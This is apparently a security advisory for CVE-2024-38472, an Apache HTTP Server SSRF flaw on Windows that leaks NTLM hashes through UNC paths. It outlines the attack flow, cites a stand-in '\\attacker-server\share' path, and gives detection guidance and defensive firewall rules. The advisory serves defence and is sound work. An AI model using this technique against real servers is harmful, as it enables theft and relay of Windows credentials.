CVE-2024-38472: Apache HTTP Server SSRF Vulnerability

CVE-2024-38472 Overview

CVE-2024-38472 is a Server-Side Request Forgery (SSRF) vulnerability in Apache HTTP Server running on Windows systems that enables attackers to potentially leak NTLM hashes to a malicious server. This vulnerability can be exploited through crafted malicious requests or content, allowing unauthorized access to sensitive Windows authentication credentials.

Critical Impact
This SSRF vulnerability on Windows-based Apache HTTP Server installations can lead to NTLM hash leakage, potentially enabling attackers to perform relay attacks or offline password cracking against captured credentials.

Affected Products

Apache HTTP Server (versions prior to 2.4.60)
NetApp ONTAP 9

Discovery Timeline

2024-07-01 - CVE-2024-38472 published to NVD
2025-07-01 - Last updated in NVD database

Technical Details for CVE-2024-38472

Vulnerability Analysis

This Server-Side Request Forgery (SSRF) vulnerability (CWE-918) affects Apache HTTP Server deployments on Windows operating systems. The vulnerability allows an attacker to force the server to make requests to arbitrary destinations, including UNC paths that trigger NTLM authentication. When the server processes malicious requests or content, it can be coerced into connecting to attacker-controlled SMB servers, inadvertently transmitting NTLM hashes.

The attack is particularly dangerous in Windows environments where NTLM authentication is commonly used. An attacker can leverage this vulnerability without requiring any authentication or user interaction, making it highly exploitable in network-accessible Apache deployments. The confidentiality impact is significant as captured NTLM hashes can be used for pass-the-hash attacks, relay attacks, or offline cracking to recover plaintext credentials.

Root Cause

The root cause of CVE-2024-38472 lies in improper validation and handling of URLs and paths within the Apache HTTP Server on Windows. The server fails to adequately restrict requests to UNC paths (e.g., \\attacker-server\share), which triggers automatic NTLM authentication by the Windows operating system. This architectural flaw allows specially crafted requests to force outbound connections that carry sensitive authentication material.

Attack Vector

The vulnerability is exploited via network-based attacks where an attacker can send malicious requests or content to the vulnerable Apache HTTP Server. The attack flow typically involves:

The attacker identifies a Windows-based Apache HTTP Server that processes user-controllable URLs or content
The attacker crafts a request containing a UNC path pointing to their malicious SMB server
When the Apache server processes this request, Windows automatically attempts NTLM authentication with the attacker's server
The attacker captures the NTLM hash, which can then be used for credential relay attacks or offline password cracking

This vulnerability allows remote exploitation without authentication. The attack does not require user interaction, making it particularly dangerous for internet-facing Apache installations on Windows.

Detection Methods for CVE-2024-38472

Indicators of Compromise

Outbound SMB (port 445) or NetBIOS (port 139) connections from the Apache HTTP Server to unexpected external IP addresses
Unusual UNC path references in Apache access logs or request parameters
Network traffic showing NTLM authentication attempts to non-domain or external systems
Apache server making unexpected outbound connections during request processing

Detection Strategies

Monitor network traffic for outbound SMB connections originating from web server hosts
Implement web application firewall (WAF) rules to detect and block UNC path patterns in requests
Analyze Apache access logs for suspicious URL patterns containing backslashes or UNC-style paths
Deploy intrusion detection signatures for SSRF attack patterns targeting Windows authentication

Monitoring Recommendations

Enable detailed logging on Apache HTTP Server to capture full request URLs and parameters
Configure network monitoring to alert on any outbound SMB traffic from web server segments
Implement SIEM rules to correlate Apache requests with subsequent outbound authentication attempts
Monitor for failed or unusual NTLM authentication events in Windows Security logs

How to Mitigate CVE-2024-38472

Immediate Actions Required

Upgrade Apache HTTP Server to version 2.4.60 or later immediately
Review and update existing configurations that access UNC paths to use the new UNCList directive
Block outbound SMB traffic (ports 445, 139) from web servers at the network perimeter
Implement network segmentation to restrict web server access to internal resources

Patch Information

Apache has released version 2.4.60 which addresses this SSRF vulnerability. Users should upgrade to this version or later to remediate CVE-2024-38472. It is important to note that existing configurations that access UNC paths will require configuration updates to use the new UNCList directive to allow legitimate access during request processing. For detailed patch information, refer to the Apache HTTP Server Vulnerabilities page. Additional vendor-specific guidance is available in the NetApp Security Advisory NTAP-20240712-0001.

Workarounds

Configure firewall rules to block all outbound SMB/NetBIOS traffic from Apache server hosts
Implement input validation to reject requests containing UNC path patterns or backslash characters
Deploy a reverse proxy or WAF in front of Apache to filter potentially malicious requests
Restrict Apache's network access using Windows Firewall or host-based security tools

bash

# Configuration example - Block outbound SMB at Windows Firewall
netsh advfirewall firewall add rule name="Block Outbound SMB" dir=out action=block protocol=tcp localport=445
netsh advfirewall firewall add rule name="Block Outbound NetBIOS" dir=out action=block protocol=tcp localport=139

# After upgrading to Apache 2.4.60+, configure UNCList for legitimate UNC access
# In httpd.conf:
# UNCList \\allowed-server\share